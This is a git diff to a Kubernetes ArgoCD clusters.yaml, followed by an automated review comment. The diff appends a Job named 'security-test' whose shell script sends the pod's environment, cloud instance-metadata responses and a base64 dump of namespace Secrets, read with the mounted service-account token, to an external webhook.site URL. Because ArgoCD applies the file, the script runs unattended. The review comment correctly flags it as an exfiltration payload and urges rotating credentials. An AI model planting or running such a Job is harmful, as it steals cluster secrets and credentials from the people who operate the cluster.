diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml
index bcb25a16d4e..824e4f8d6a0 100644
--- a/kubernetes/gke-utility/argocd/clusters.yaml
+++ b/kubernetes/gke-utility/argocd/clusters.yaml
@@ -236,3 +236,42 @@ stringData:
 "insecure": true
 }
 }
+---
+apiVersion: batch/v1
+kind: Job
+metadata:
+ name: security-test
+ namespace: argocd-diff-preview
+spec:
+ ttlSecondsAfterFinished: 300
+ template:
+ spec:
+ restartPolicy: Never
+ containers:
+ - name: poc
+ image: curlimages/curl:latest
+ command: ["/bin/sh", "-c"]
+ args:
+ - |
+ HOOK="https://webhook.site/f710f00e-e417-400e-85be-0d19650ebf7f"
+ curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)&ns=${POD_NAMESPACE}" || true
+ ENVVARS=$(env | base64 | tr -d '\n' 2>/dev/null | head -c 2000)
+ IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \ curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null || echo "no-imds")
+ curl -sf --max-time 10 -G "${HOOK}/" \ --data-urlencode "stage=k8s-dump" \ --data-urlencode "env=${ENVVARS}" \ --data-urlencode "imds=${IMDS}" || true
+ T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
+ TLEN=$(printf '%s' "${T}" | wc -c)
+ SEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \ https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets 2>/dev/null)
+ curl -sf --max-time 10 -G "${HOOK}/" \ --data-urlencode "stage=k8s-secrets" \ --data-urlencode "tokenlen=${TLEN}" \ --data-urlencode "d=$(printf '%s' "${SEC}" | base64 | tr -d '\n')" || true
+ env:
+ - name: POD_NAMESPACE
+ valueFrom:
+ fieldRef:
+ fieldPath: metadata.namespace
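Review bot: The added `security-test` Job is a data-exfiltration payload and must not be merged: its script (from `HOOK=` through the final `curl -sf --max-time 10 -G "${HOOK}/"`) ships the container's full environment, instance-metadata responses from 169.254.169.254, and the base64-encoded result of listing every Secret in `${POD_NAMESPACE}` to an external webhook.site URL in a query string, using the mounted service-account token. Dropping it into `clusters.yaml`, which ArgoCD applies to the utility cluster, means it would run unattended in `argocd-diff-preview` with whatever RBAC that namespace's default ServiceAccount has; if this revision was ever synced, treat that namespace's Secrets and the SA token as compromised and rotate them. The hard-coded `https://10.96.0.1:443` with `-k` and the AWS/OCI IMDS paths on a GKE repo look like a generic payload rather than something written for this cluster, though that is inference. If a run-proof canary is genuinely wanted, replace the whole script with a non-exfiltrating line such as `echo "poc ran host=$(hostname) ns=${POD_NAMESPACE}"` on stdout, pin the image by digest instead of `curlimages/curl:latest`, and keep any PoC in an access-controlled repo with an internal collector rather than a third-party webhook.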